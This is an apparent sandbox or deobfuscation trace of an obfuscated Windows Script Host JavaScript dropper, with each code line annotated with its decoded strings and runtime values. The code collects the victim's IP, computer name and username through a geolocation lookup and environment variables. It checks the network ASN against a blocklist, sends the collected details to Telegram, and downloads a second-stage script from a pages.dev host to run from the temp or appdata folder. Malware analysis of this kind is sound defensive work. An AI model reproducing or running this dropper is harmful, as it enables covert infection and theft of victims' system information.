393	if ( _0x1023eb[_0x944257 ( - 0x25f, - 0x20e, - 0x242, - 0x232 ) ] ( _0x1023eb[_0x944257 ( - 0x222, - 0x1fe, - 0x1bc, - 0x244 ) ], _0x1023eb[_0x944257 ( - 0x19c, - 0x1fe, - 0x249, - 0x1ec ) ] ) )	_0x944257(-607,-526,-578,-562) ➔ "EfNJi" _0x944257(-546,-510,-444,-580) ➔ "Fmpbn" _0x944257(-412,-510,-585,-492) ➔ "Fmpbn" [object Object].EfNJi("NKzId","NKzId") ➔ false
394	_0x446bfa = _0x15024f['parse'] ( _0x19f9cc );
395	else
396	{
397	var _0x4200e4 = _0x1023eb[_0x944257 ( - 0x281, - 0x25f, - 0x23d, - 0x268 ) ] ( parseJSON, _0x196bcc[_0x205b57 ( - 0x110, - 0xaa, - 0xa4, - 0xe2 ) + 'xt'] );	_0x944257(-641,-607,-573,-616) ➔ "xkbao" _0x205b57(-272,-170,-164,-226) ➔ "responseTe" [object Object].xkbao(function parseJSON(_0x588d37),"{ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New York", "country_code": "US", "country_name": "United States", "continent_code": "NA", "continent_name": "North America", "region": "New York", "district": "", "timezone_name": "America\/New_York", "connection_type": "Corporate", "asn_number": 3356, "asn_org": "Level 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false }") ➔ [object Object]
398	if ( _0x4200e4 && _0x4200e4[_0x205b57 ( - 0x95, - 0x5a, - 0xf0, - 0xbf ) ] && _0x4200e4[_0x944257 ( - 0x2a8, - 0x25a, - 0x296, - 0x296 ) + 'de'] )	_0x205b57(-149,-90,-240,-191) ➔ "asn" _0x944257(-680,-602,-662,-662) ➔ "country_co"
399	{
400	var _0xd4a041 = {
401	};
402	return _0xd4a041[_0x944257 ( - 0x1e1, - 0x217, - 0x252, - 0x1b4 ) ] = _0x4200e4[_0x205b57 ( - 0xb7, - 0x66, - 0x8e, - 0xbf ) ], _0xd4a041[_0x944257 ( - 0x22b, - 0x1c6, - 0x1fc, - 0x223 ) + 'e'] = _0x4200e4[_0x205b57 ( - 0xfd, - 0x14c, - 0x14d, - 0x102 ) + 'de'], _0xd4a041;	_0x944257(-481,-535,-594,-436) ➔ "asn" _0x205b57(-183,-102,-142,-191) ➔ "asn" _0x944257(-555,-454,-508,-547) ➔ "countryCod" _0x205b57(-253,-332,-333,-258) ➔ "country_co"
403	}
404	else
405	{
406	var _0x4b28a5 = {
407	};
408	return _0x4b28a5[_0x205b57 ( - 0xcf, - 0x99, - 0x82, - 0xbf ) ] = '', _0x4b28a5[_0x205b57 ( - 0xc7, - 0x94, - 0xc9, - 0x6e ) + 'e'] = '', _0x4b28a5;
409	}
410	}
411	}
412	else
413	{
414	var _0x41b68c = {
415	};
416	return _0x41b68c[_0x205b57 ( - 0x8d, - 0x7f, - 0x91, - 0xbf ) ] = '', _0x41b68c[_0x205b57 ( - 0x55, - 0x4c, - 0xb6, - 0x6e ) + 'e'] = '', _0x41b68c;
417	}
418	}
419	catch ( _0xdb85a0 )
420	{
421	if ( _0x1023eb[_0x944257 ( - 0x26b, - 0x224, - 0x1de, - 0x262 ) ] ( _0x1023eb[_0x205b57 ( - 0x33, - 0x98, - 0x64, - 0x5d ) ], _0x944257 ( - 0x2aa, - 0x25c, - 0x2bb, - 0x28d ) ) )
422	{
423	var _0x5e9220 = {
424	};
425	return _0x5e9220[_0x944257 ( - 0x23c, - 0x217, - 0x1c2, - 0x1cf ) ] = '', _0x5e9220[_0x205b57 ( - 0x9d, - 0x13, - 0x2b, - 0x6e ) + 'e'] = '', _0x5e9220;
426	}
427	else
428	{
429	var _0x5df3ac = {
430	};
431	return _0x5df3ac['asn'] = _0x4ec43d[_0x944257 ( - 0x251, - 0x217, - 0x1f7, - 0x205 ) ], _0x5df3ac[_0x944257 ( - 0x1cf, - 0x1c6, - 0x1df, - 0x195 ) + 'e'] = _0x51d058[_0x205b57 ( - 0x13d, - 0x156, - 0xb1, - 0x102 ) + 'de'], _0x5df3ac;
432	}
433	}
434	}
435	function getSystemInfo() {	getSystemInfo() ➔ [object Object]
436	function _0x5d488f(_0x9c5e88, _0x4a685c, _0x11fffb, _0x583817) {	_0x5d488f(-325,-244,-229,-306) ➔ "ell" _0x5d488f(-23,-117,-103,-114) ➔ "%COMPUTERN" _0x5d488f(-304,-238,-227,-128) ➔ "AME%" _0x5d488f(-274,-186,-204,-199) ➔ "FvyCS" _0x5d488f(-139,-87,-78,-56) ➔ "msxml2.xml" _0x5d488f(-159,-155,-192,-134) ➔ "http" _0x5d488f(-190,-115,-208,-111) ➔ "Mozilla/5." _0x5d488f(-209,-218,-173,-118) ➔ " Chrome/73" _0x5d488f(-105,19,-74,-133) ➔ " Safari/53" _0x5d488f(-289,-286,-237,-178) ➔ "nEUrt"
437	return _0x44b961 ( _0x583817, _0x4a685c - 0x8a, _0x11fffb - 0xa, _0x11fffb - 0x75 );	_0x44b961(-306,-382,-239,-346) ➔ "ell" _0x44b961(-114,-255,-113,-220) ➔ "%COMPUTERN" _0x44b961(-128,-376,-237,-344) ➔ "AME%" _0x44b961(-199,-324,-214,-321) ➔ "FvyCS" _0x44b961(-56,-225,-88,-195) ➔ "msxml2.xml" _0x44b961(-134,-293,-202,-309) ➔ "http" _0x44b961(-111,-253,-218,-325) ➔ "Mozilla/5." _0x44b961(-118,-356,-183,-290) ➔ " Chrome/73" _0x44b961(-133,-119,-84,-191) ➔ " Safari/53" _0x44b961(-178,-424,-247,-354) ➔ "nEUrt"
438	}
439	var _0x154cb0 = {
440	'nEUrt' : 'WScript.Sh' + _0x5d488f ( - 0x145, - 0xf4, - 0xe5, - 0x132 ),	_0x5d488f(-325,-244,-229,-306) ➔ "ell"
441	'qNiIk' : _0x5d488f ( - 0x17, - 0x75, - 0x67, - 0x72 ) + _0x5d488f ( - 0x130, - 0xee, - 0xe3, - 0x80 ),	_0x5d488f(-23,-117,-103,-114) ➔ "%COMPUTERN" _0x5d488f(-304,-238,-227,-128) ➔ "AME%"
442	'FnBvU' : _0x4f2308 ( 0x1f0, 0x241, 0x256, 0x253 ),	_0x4f2308(496,577,598,595) ➔ "%USERNAME%"
443	'hqFAq' : _0x5d488f ( - 0x112, - 0xba, - 0xcc, - 0xc7 ),	_0x5d488f(-274,-186,-204,-199) ➔ "FvyCS"
444	'Oazhv' : _0x5d488f ( - 0x8b, - 0x57, - 0x4e, - 0x38 ) + _0x5d488f ( - 0x9f, - 0x9b, - 0xc0, - 0x86 ),	_0x5d488f(-139,-87,-78,-56) ➔ "msxml2.xml" _0x5d488f(-159,-155,-192,-134) ➔ "http"
445	'pbntk' : 'https://js' + 'on.geoiplo' + _0x4f2308 ( 0x229, 0x256, 0x293, 0x229 ),	_0x4f2308(553,598,659,553) ➔ "okup.io/"
446	'PTPAj' : _0x5d488f ( - 0xbe, - 0x73, - 0xd0, - 0x6f ) + _0x4f2308 ( 0x2c6, 0x27d, 0x248, 0x229 ) + _0x4f2308 ( 0x281, 0x245, 0x1df, 0x28a ) + _0x4f2308 ( 0x2a7, 0x2ef, 0x2fd, 0x2a9 ) + ')\x20AppleWeb' + _0x4f2308 ( 0x282, 0x242, 0x2a5, 0x259 ) + _0x4f2308 ( 0x324, 0x2f9, 0x2f6, 0x32e ) + 'ike\x20Gecko)' + _0x5d488f ( - 0xd1, - 0xda, - 0xad, - 0x76 ) + _0x4f2308 ( 0x2d0, 0x2fa, 0x327, 0x2ec ) + _0x5d488f ( - 0x69, 0x13, - 0x4a, - 0x85 ) + '7.36',	_0x5d488f(-190,-115,-208,-111) ➔ "Mozilla/5." _0x4f2308(710,637,584,553) ➔ "0 (Windows" _0x4f2308(641,581,479,650) ➔ " NT 10.0; " _0x4f2308(679,751,765,681) ➔ "Win64; x64" _0x4f2308(642,578,677,601) ➔ "Kit/537.36" _0x4f2308(804,761,758,814) ➔ " (KHTML, l" _0x5d488f(-209,-218,-173,-118) ➔ " Chrome/73" _0x4f2308(720,762,807,748) ➔ ".0.3683.86" _0x5d488f(-105,19,-74,-133) ➔ " Safari/53"
447	'qAGyQ' : function (_0x57de2e, _0x166efc) {	[object Object].qAGyQ(200,200) ➔ true
448	return _0x57de2e == _0x166efc;
449	},
450	'OFwTn' : function (_0x2a99aa, _0x17a274) {	[object Object].OFwTn("NrNuw","NrNuw") ➔ false
451	return _0x2a99aa !== _0x17a274;
452	},
453	'RKQLw' : _0x4f2308 ( 0x2a9, 0x26e, 0x2ce, 0x2d4 ),	_0x4f2308(681,622,718,724) ➔ "NrNuw"
454	'LhRLs' : function (_0x88af10, _0x5d271c) {	[object Object].LhRLs(function parseJSON(_0x588d37),"{ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New York", "country_code": "US", "country_name": "United States", "continent_code": "NA", "continent_name": "North America", "region": "New York", "district": "", "timezone_name": "America\/New_York", "connection_type": "Corporate", "asn_number": 3356, "asn_org": "Level 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false }") ➔ [object Object]
455	return _0x88af10 ( _0x5d271c );	parseJSON("{ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New York", "country_code": "US", "country_name": "United States", "continent_code": "NA", "continent_name": "North America", "region": "New York", "district": "", "timezone_name": "America\/New_York", "connection_type": "Corporate", "asn_number": 3356, "asn_org": "Level 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false }") ➔ [object Object]
456	},
457	'rmRcj' : _0x4f2308 ( 0x292, 0x24a, 0x261, 0x201 )	_0x4f2308(658,586,609,513) ➔ "Unknown"
458	}, _0x4c8c00 = new ActiveXObject ( _0x154cb0[_0x5d488f ( - 0x121, - 0x11e, - 0xed, - 0xb2 ) ] ), _0x1b693c = _0x4c8c00[_0x5d488f ( - 0x94, - 0x4c, - 0x82, - 0x20 ) + _0x4f2308 ( 0x245, 0x295, 0x24b, 0x2fc ) + _0x5d488f ( - 0x104, - 0xe3, - 0xcb, - 0x73 ) ] ( _0x154cb0[_0x4f2308 ( 0x28d, 0x237, 0x291, 0x29e ) ] ), _0x2633e8 = _0x4c8c00[_0x5d488f ( - 0x99, - 0x5e, - 0x82, - 0xbe ) + 'ronmentStr' + 'ings'] ( _0x154cb0[_0x5d488f ( - 0xd7, - 0x4e, - 0xa1, - 0x57 ) ] );
459	try
460	{
461	if ( _0x4f2308 ( 0x315, 0x2af, 0x2ef, 0x300 ) !== _0x154cb0[_0x4f2308 ( 0x2aa, 0x277, 0x22b, 0x29f ) ] )	_0x4f2308(789,687,751,768) ➔ "bYMJo" _0x4f2308(682,631,555,671) ➔ "hqFAq"
462	{
463	var _0x632a26 = WScript[_0x5d488f ( - 0xea, - 0xdb, - 0xd4, - 0x107 ) + 'ct'] ( _0x154cb0[_0x4f2308 ( 0x26e, 0x2a6, 0x2af, 0x2b0 ) ] );	_0x5d488f(-234,-219,-212,-263) ➔ "CreateObje" _0x4f2308(622,678,687,688) ➔ "Oazhv" Windows Script Host.CreateObject("msxml2.xmlhttp") ➔
464	_0x632a26[_0x4f2308 ( 0x250, 0x249, 0x231, 0x1f6 ) ] ( _0x5d488f ( - 0x83, - 0x9d, - 0x6a, - 0xa1 ), _0x154cb0[_0x5d488f ( - 0xaa, - 0x3e, - 0x80, - 0xb6 ) ], ! [] ), _0x632a26[_0x4f2308 ( 0x315, 0x2e0, 0x333, 0x2cc ) + _0x4f2308 ( 0x257, 0x2a7, 0x275, 0x2b6 ) ] ( _0x5d488f ( 0x15, 0x18, - 0x4d, - 0x78 ), _0x154cb0[_0x4f2308 ( 0x27d, 0x2dd, 0x316, 0x29b ) ] ), _0x632a26[_0x4f2308 ( 0x304, 0x2f4, 0x315, 0x2c3 ) ] ( );	_0x4f2308(592,585,561,502) ➔ "open" _0x5d488f(-131,-157,-106,-161) ➔ "GET" _0x5d488f(-170,-62,-128,-182) ➔ "pbntk" open("GET","https://json.geoiplookup.io/",false) ➔ undefined _0x4f2308(789,736,819,716) ➔ "setRequest" _0x4f2308(599,679,629,694) ➔ "Header" _0x5d488f(21,24,-77,-120) ➔ "User-Agent" _0x4f2308(637,733,790,667) ➔ "PTPAj" setRequestHeader("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36") ➔ undefined _0x4f2308(772,756,789,707) ➔ "send" send() ➔ undefined
465	if ( _0x154cb0[_0x5d488f ( - 0xc7, - 0xeb, - 0xc1, - 0x78 ) ] ( _0x632a26[_0x4f2308 ( 0x26f, 0x2b5, 0x2fc, 0x281 ) ], - 0x1 * - 0xaab + - 0x144 * 0xc + - 0x17 * - 0x3b ) )	_0x5d488f(-199,-235,-193,-120) ➔ "qAGyQ" _0x4f2308(623,693,764,641) ➔ "status" [object Object].qAGyQ(200,200) ➔ true
466	{
467	if ( _0x154cb0[_0x5d488f ( - 0xbb, - 0xc3, - 0xa6, - 0xa3 ) ] ( _0x154cb0[_0x5d488f ( 0x2f, - 0x63, - 0x33, - 0x89 ) ], _0x154cb0[_0x4f2308 ( 0x35b, 0x2fd, 0x2b0, 0x2d3 ) ] ) )	_0x5d488f(-187,-195,-166,-163) ➔ "OFwTn" _0x5d488f(47,-99,-51,-137) ➔ "RKQLw" _0x4f2308(859,765,688,723) ➔ "RKQLw" [object Object].OFwTn("NrNuw","NrNuw") ➔ false
468	{
469	var _0x27aa7b;
470	try
471	{
472	_0x27aa7b = _0x10d555[_0x5d488f ( - 0xf, - 0xf, - 0x60, - 0xbf ) ] ( _0x20fd23 );
473	}
474	catch ( _0x5d81cf )
475	{
476	return null;
477	}
478	return _0x27aa7b;
479	}
480	else
481	{
482	var _0x14acb6 = _0x154cb0[_0x5d488f ( - 0x1c, - 0x74, - 0x5c, - 0x12 ) ] ( parseJSON, _0x632a26['responseTe' + 'xt'] );	_0x5d488f(-28,-116,-92,-18) ➔ "LhRLs" [object Object].LhRLs(function parseJSON(_0x588d37),"{ "ip": "8.46.123.175", "isp": "Level 3", "org": "CenturyLink Communications, LLC", "hostname": "static-cpe-8-46-123-175.centurylink.com", "latitude": 40.7128, "longitude": -74.006, "postal_code": "10123", "city": "New York", "country_code": "US", "country_name": "United States", "continent_code": "NA", "continent_name": "North America", "region": "New York", "district": "", "timezone_name": "America\/New_York", "connection_type": "Corporate", "asn_number": 3356, "asn_org": "Level 3 Communications, Inc.", "asn": "AS3356 - Level 3 Communications, Inc.", "currency_code": "USD", "currency_name": "US Dollar", "success": true, "premium": false }") ➔ [object Object]
483	if ( _0x14acb6 && _0x14acb6['ip'] )
484	{
485	var _0x3832fa = {
486	};
487	return _0x3832fa[_0x4f2308 ( 0x2af, 0x2b7, 0x2f3, 0x2fc ) ] = _0x14acb6['ip'], _0x3832fa[_0x4f2308 ( 0x2ac, 0x282, 0x227, 0x2c8 ) + 'me'] = _0x1b693c, _0x3832fa['user'] = _0x2633e8, _0x3832fa;	_0x4f2308(687,695,755,764) ➔ "ipAddress" _0x4f2308(684,642,551,712) ➔ "computerNa"
488	}
489	}
490	}
491	}
492	else
493	_0x281a86['Echo'] ( 'Expired\x20li' + 'nk' );
494	}
495	catch ( _0xa7c347 )
496	{
497	}
498	var _0x2aafaf = {
499	};
500	_0x2aafaf[_0x4f2308 ( 0x312, 0x2b7, 0x2c0, 0x2f2 ) ] = _0x154cb0[_0x4f2308 ( 0x261, 0x286, 0x242, 0x2d8 ) ];
501	function _0x4f2308(_0xf64e5b, _0x1f3d56, _0x171673, _0x4f393e) {	_0x4f2308(496,577,598,595) ➔ "%USERNAME%" _0x4f2308(553,598,659,553) ➔ "okup.io/" _0x4f2308(710,637,584,553) ➔ "0 (Windows" _0x4f2308(641,581,479,650) ➔ " NT 10.0; " _0x4f2308(679,751,765,681) ➔ "Win64; x64" _0x4f2308(642,578,677,601) ➔ "Kit/537.36" _0x4f2308(804,761,758,814) ➔ " (KHTML, l" _0x4f2308(720,762,807,748) ➔ ".0.3683.86" _0x4f2308(681,622,718,724) ➔ "NrNuw" _0x4f2308(658,586,609,513) ➔ "Unknown"
502	return _0x346f50 ( _0xf64e5b, _0x1f3d56 - 0x28, _0x171673 - 0x1e2, _0x4f393e - 0xe8 );	_0x346f50(496,537,116,363) ➔ "%USERNAME%" _0x346f50(553,558,177,321) ➔ "okup.io/" _0x346f50(710,597,102,321) ➔ "0 (Windows" _0x346f50(641,541,-3,418) ➔ " NT 10.0; " _0x346f50(679,711,283,449) ➔ "Win64; x64" _0x346f50(642,538,195,369) ➔ "Kit/537.36" _0x346f50(804,721,276,582) ➔ " (KHTML, l" _0x346f50(720,722,325,516) ➔ ".0.3683.86" _0x346f50(681,582,236,492) ➔ "NrNuw" _0x346f50(658,546,127,281) ➔ "Unknown"
503	}
504	return _0x2aafaf[_0x5d488f ( - 0xd1, - 0xe1, - 0xae, - 0x101 ) + 'me'] = _0x1b693c, _0x2aafaf[_0x5d488f ( 0x3, - 0x8, - 0x43, - 0x2d ) ] = _0x2633e8, _0x2aafaf;
505	}
506	var asnAndCountry = getASNAndCountry ( ), systemInfo = getSystemInfo ( );	getASNAndCountry() ➔ [object Object] getSystemInfo() ➔ [object Object]
507	if ( isASNBlocked ( asnAndCountry[_0x44b961 ( - 0x122, - 0xb9, - 0x114, - 0x111 ) ], asnAndCountry['countryCod' + 'e'] ) )	_0x44b961(-290,-185,-276,-273) ➔ "asn" isASNBlocked("AS3356 - Level 3 Communications, Inc.","US") ➔ false
508	sendTelegramNotification ( _0x44b961 ( - 0x8f, - 0xd1, - 0x81, - 0xd0 ) + _0x44b961 ( - 0x184, - 0x155, - 0x119, - 0x14b ) + systemInfo['ipAddress'] + ( ',\x20Computer' + '\x20Name:\x20' ) + systemInfo[_0x44b961 ( - 0xe1, - 0xcf, - 0x17a, - 0x123 ) + 'me'] + _0x346f50 ( 0x2a1, 0x26a, 0x262, 0x240 ) + systemInfo[_0x44b961 ( - 0xa8, - 0x118, - 0x120, - 0xb8 ) ] ), WScript[_0x44b961 ( - 0x10d, - 0x7b, - 0xb2, - 0xbb ) ] ( );
509	else
510	{
511	sendTelegramNotification ( _0x346f50 ( 0x28b, 0x294, 0x235, 0x261 ) + 'nted!\x20IP:\x20' + systemInfo[_0x44b961 ( - 0xc8, - 0x108, - 0xed, - 0xee ) ] + ( _0x346f50 ( 0x26e, 0x213, 0x26d, 0x267 ) + _0x346f50 ( 0x29d, 0x2c0, 0x299, 0x307 ) ) + systemInfo[_0x44b961 ( - 0x171, - 0x10a, - 0x15f, - 0x123 ) + 'me'] + _0x346f50 ( 0x28a, 0x26a, 0x295, 0x293 ) + systemInfo[_0x44b961 ( - 0xda, - 0x6d, - 0xea, - 0xb8 ) ] );	_0x346f50(651,660,565,609) ➔ "Access gra" _0x44b961(-200,-264,-237,-238) ➔ "ipAddress" _0x346f50(622,531,621,615) ➔ ", Computer" _0x346f50(669,704,665,775) ➔ " Name: " _0x44b961(-369,-266,-351,-291) ➔ "computerNa" _0x346f50(650,618,661,659) ➔ ", User: " _0x44b961(-218,-109,-234,-184) ➔ "user" sendTelegramNotification("Access granted! IP: 8.46.123.175, Computer Name: JONES-PC, User: jones") ➔ undefined
512	try
513	{
514	var kCyLba = ( _0x44b961 ( - 0xb5, - 0xed, - 0xfc, - 0x10b ) + '\|3\|4\|0\|1\|7' + _0x44b961 ( - 0x18f, - 0x171, - 0x1aa, - 0x14d ) )[_0x44b961 ( - 0xa6, - 0xe4, - 0xef, - 0xb7 ) ] ( '\|' ), QsmOdy = - 0x136f + 0x2c8 + 0x10a7;	_0x44b961(-181,-237,-252,-267) ➔ "8\|5\|9\|2\|10" _0x44b961(-399,-369,-426,-333) ➔ "\|6\|11" _0x44b961(-166,-228,-239,-183) ➔ "split" "8\|5\|9\|2\|10\|3\|4\|0\|1\|7\|6\|11".split("\|") ➔ 8,5,9,2,10,3,4,0,1,7,6,11
515	while (! ! [ ] )
516	{
517	switch ( kCyLba[QsmOdy ++] ) {
518	case '0' :
519	is_temp ? path = tempdir + '\x5c' + path : path = appdatadir + '\x5c' + path;
520	continue ;
521	case '1' :
522	var xHttp = WScript[_0x346f50 ( 0x245, 0x234, 0x1d4, 0x267 ) + 'ct'] ( _0x346f50 ( 0x20c, 0x23e, 0x248, 0x288 ) + _0x346f50 ( 0x1c1, 0x214, 0x279, 0x1b4 ) );	_0x346f50(581,564,468,615) ➔ "CreateObje" _0x346f50(524,574,584,648) ➔ "Microsoft." _0x346f50(449,532,633,436) ➔ "XMLHTTP" Windows Script Host.CreateObject("Microsoft.XMLHTTP") ➔
523	continue ;
524	case '2' :
525	var appdatadir = wshShell[_0x346f50 ( 0x2cf, 0x286, 0x291, 0x271 ) + _0x346f50 ( 0x285, 0x26d, 0x250, 0x281 ) + _0x44b961 ( - 0x151, - 0x15d, - 0x13f, - 0x140 ) ] ( '%appdata%' );	_0x346f50(719,646,657,625) ➔ "ExpandEnvi" _0x346f50(645,621,592,641) ➔ "ronmentStr" _0x44b961(-337,-349,-319,-320) ➔ "ings" ExpandEnvironmentStrings("%appdata%") ➔ "C:\Users\jones\AppData\Roaming"
526	continue ;
527	case '3' :
528	var url = _0x346f50 ( 0x29e, 0x2da, 0x2b9, 0x307 ) + _0x44b961 ( - 0x77, - 0x7f, - 0xfd, - 0xd9 ) + _0x346f50 ( 0x20f, 0x21e, 0x22c, 0x1e0 ) + _0x346f50 ( 0x262, 0x263, 0x277, 0x24d ) + '575.js';	_0x346f50(670,730,697,775) ➔ "https://te" _0x44b961(-119,-127,-253,-217) ➔ "xtjdbimanr" _0x346f50(527,542,556,480) ➔ "miniall.pa" _0x346f50(610,611,631,589) ➔ "ges.dev/98"
529	continue ;
530	case '4' :
531	var is_temp = ! ! [];
532	continue ;
533	case '5' :
534	var wshShell = WScript['CreateObje' + 'ct'] ( 'WScript.Sh' + _0x44b961 ( - 0x178, - 0x132, - 0x1a7, - 0x15a ) );	_0x44b961(-376,-306,-423,-346) ➔ "ell" Windows Script Host.CreateObject("WScript.Shell") ➔
535	continue ;
536	case '6' :
537	xHttp[_0x44b961 ( - 0xa2, - 0x8c, - 0xa8, - 0xb1 ) ] ( );	_0x44b961(-162,-140,-168,-177) ➔ "send" send() ➔ undefined
538	continue ;
539	case '7' :
540	xHttp[_0x346f50 ( 0x1c4, 0x221, 0x261, 0x211 ) ] ( _0x44b961 ( - 0x13f, - 0x135, - 0xbc, - 0xdf ), url, ! [] );	_0x346f50(452,545,609,529) ➔ "open" _0x44b961(-319,-309,-188,-223) ➔ "GET" open("GET","https://textjdbimanrminiall.pages.dev/98575.js",false) ➔ undefined
541	continue ;
542	case '8' :
543	String[_0x346f50 ( 0x260, 0x2bc, 0x2f7, 0x27c ) ][_0x346f50 ( 0x29d, 0x244, 0x28e, 0x1e7 ) ] =	_0x346f50(608,700,759,636) ➔ "prototype" _0x346f50(669,580,654,487) ➔ "endsWith"
544	function (_0x2a551c) {	"C:\Users\jones\AppData\Local\Temp\98575.js".endsWith(".jar") ➔ false "C:\Users\jones\AppData\Local\Temp\98575.js".endsWith(".vbs") ➔ false "C:\Users\jones\AppData\Local\Temp\98575.js".endsWith(".wsf") ➔ false
545	var _0x5185a9 = {
546	};
547	_0x5185a9[_0x56f1ce ( 0x412, 0x40d, 0x43d, 0x451 ) ] =	_0x56f1ce(1042,1037,1085,1105) ➔ "ELNdD" _0x56f1ce(1042,1037,1085,1105) ➔ "ELNdD" _0x56f1ce(1042,1037,1085,1105) ➔ "ELNdD"
548	function (_0x29eb7f, _0x12b7d9) {	[object Object].ELNdD(42,4) ➔ 38 [object Object].ELNdD(42,4) ➔ 38 [object Object].ELNdD(42,4) ➔ 38
549	return _0x29eb7f - _0x12b7d9;
550	},
551	_0x5185a9[_0x56f1ce ( 0x427, 0x449, 0x447, 0x426 ) ] =	_0x56f1ce(1063,1097,1095,1062) ➔ "fPTEo" _0x56f1ce(1063,1097,1095,1062) ➔ "fPTEo" _0x56f1ce(1063,1097,1095,1062) ➔ "fPTEo"
552	function (_0x23f853, _0x24fdff) {	[object Object].fPTEo("5.js",".jar") ➔ false [object Object].fPTEo("5.js",".vbs") ➔ false [object Object].fPTEo("5.js",".wsf") ➔ false
553	return _0x23f853 == _0x24fdff;
554	};
555	var _0x1ee766 = _0x5185a9;
556	function _0x56f1ce(_0x34c315, _0x29450a, _0x5ccfff, _0x509023) {	_0x56f1ce(1042,1037,1085,1105) ➔ "ELNdD" _0x56f1ce(1063,1097,1095,1062) ➔ "fPTEo" _0x56f1ce(1007,1005,1090,990) ➔ "length" _0x56f1ce(1050,987,896,990) ➔ "length" _0x56f1ce(1042,1037,1085,1105) ➔ "ELNdD" _0x56f1ce(1063,1097,1095,1062) ➔ "fPTEo" _0x56f1ce(1007,1005,1090,990) ➔ "length" _0x56f1ce(1050,987,896,990) ➔ "length" _0x56f1ce(1042,1037,1085,1105) ➔ "ELNdD" _0x56f1ce(1063,1097,1095,1062) ➔ "fPTEo"
557	return _0x346f50 ( _0x5ccfff, _0x509023 - 0x19d, _0x5ccfff - 0x18, _0x509023 - 0x8a );	_0x346f50(1085,692,1061,967) ➔ "ELNdD" _0x346f50(1095,649,1071,924) ➔ "fPTEo" _0x346f50(1090,577,1066,852) ➔ "length" _0x346f50(896,577,872,852) ➔ "length" _0x346f50(1085,692,1061,967) ➔ "ELNdD" _0x346f50(1095,649,1071,924) ➔ "fPTEo" _0x346f50(1090,577,1066,852) ➔ "length" _0x346f50(896,577,872,852) ➔ "length" _0x346f50(1085,692,1061,967) ➔ "ELNdD" _0x346f50(1095,649,1071,924) ➔ "fPTEo"
558	}
559	function _0x2c8f84(_0x3885ce, _0x14c2bc, _0x15acf7, _0x39e82c) {	_0x2c8f84(658,728,788,788) ➔ "ELNdD" _0x2c8f84(720,685,759,696) ➔ "fPTEo" _0x2c8f84(658,728,788,788) ➔ "ELNdD" _0x2c8f84(720,685,759,696) ➔ "fPTEo" _0x2c8f84(658,728,788,788) ➔ "ELNdD" _0x2c8f84(720,685,759,696) ➔ "fPTEo"
560	return _0x346f50 ( _0x3885ce, _0x14c2bc - 0x24, _0x15acf7 - 0x1e, _0x39e82c - 0x13b );	_0x346f50(658,692,758,473) ➔ "ELNdD" _0x346f50(720,649,729,381) ➔ "fPTEo" _0x346f50(658,692,758,473) ➔ "ELNdD" _0x346f50(720,649,729,381) ➔ "fPTEo" _0x346f50(658,692,758,473) ➔ "ELNdD" _0x346f50(720,649,729,381) ➔ "fPTEo"
561	}
562	var _0x49d2fe = this['substr'] ( _0x1ee766[_0x2c8f84 ( 0x292, 0x2d8, 0x314, 0x314 ) ] ( this[_0x56f1ce ( 0x3ef, 0x3ed, 0x442, 0x3de ) ], _0x2a551c[_0x56f1ce ( 0x41a, 0x3db, 0x380, 0x3de ) ] ) );	_0x2c8f84(658,728,788,788) ➔ "ELNdD" _0x56f1ce(1007,1005,1090,990) ➔ "length" _0x56f1ce(1050,987,896,990) ➔ "length" [object Object].ELNdD(42,4) ➔ 38 C:\Users\jones\AppData\Local\Temp\98575.js.substr(38) ➔ "5.js" _0x2c8f84(658,728,788,788) ➔ "ELNdD" _0x56f1ce(1007,1005,1090,990) ➔ "length" _0x56f1ce(1050,987,896,990) ➔ "length" [object Object].ELNdD(42,4) ➔ 38 C:\Users\jones\AppData\Local\Temp\98575.js.substr(38) ➔ "5.js" _0x2c8f84(658,728,788,788) ➔ "ELNdD" _0x56f1ce(1007,1005,1090,990) ➔ "length" _0x56f1ce(1050,987,896,990) ➔ "length" [object Object].ELNdD(42,4) ➔ 38 C:\Users\jones\AppData\Local\Temp\98575.js.substr(38) ➔ "5.js"
563	return _0x1ee766[_0x2c8f84 ( 0x2d0, 0x2ad, 0x2f7, 0x2b8 ) ] ( _0x49d2fe, _0x2a551c );	_0x2c8f84(720,685,759,696) ➔ "fPTEo" [object Object].fPTEo("5.js",".jar") ➔ false _0x2c8f84(720,685,759,696) ➔ "fPTEo" [object Object].fPTEo("5.js",".vbs") ➔ false _0x2c8f84(720,685,759,696) ➔ "fPTEo" [object Object].fPTEo("5.js",".wsf") ➔ false
564	};
565	continue ;
566	case '9' :
567	var tempdir = wshShell[_0x346f50 ( 0x2c2, 0x286, 0x2d3, 0x2a0 ) + _0x44b961 ( - 0xfa, - 0x139, - 0x131, - 0x110 ) + 'ings'] ( _0x346f50 ( 0x1d0, 0x22c, 0x209, 0x22e ) );	_0x346f50(706,646,723,672) ➔ "ExpandEnvi" _0x44b961(-250,-313,-305,-272) ➔ "ronmentStr" _0x346f50(464,556,521,558) ➔ "%temp%" ExpandEnvironmentStrings("%temp%") ➔ "C:\Users\jones\AppData\Local\Temp"
568	continue ;
569	case '10' :
570	var path = _0x346f50 ( 0x1d7, 0x22b, 0x1d6, 0x1fa );	_0x346f50(471,555,470,506) ➔ "98575.js"
571	continue ;
572	case '11' :
573	if ( xHttp[_0x346f50 ( 0x233, 0x28d, 0x27e, 0x27d ) ] == 0x3 * - 0xa11 + 0xf09 + 0x13a * 0xd )	_0x346f50(563,653,638,637) ➔ "status"
574	{
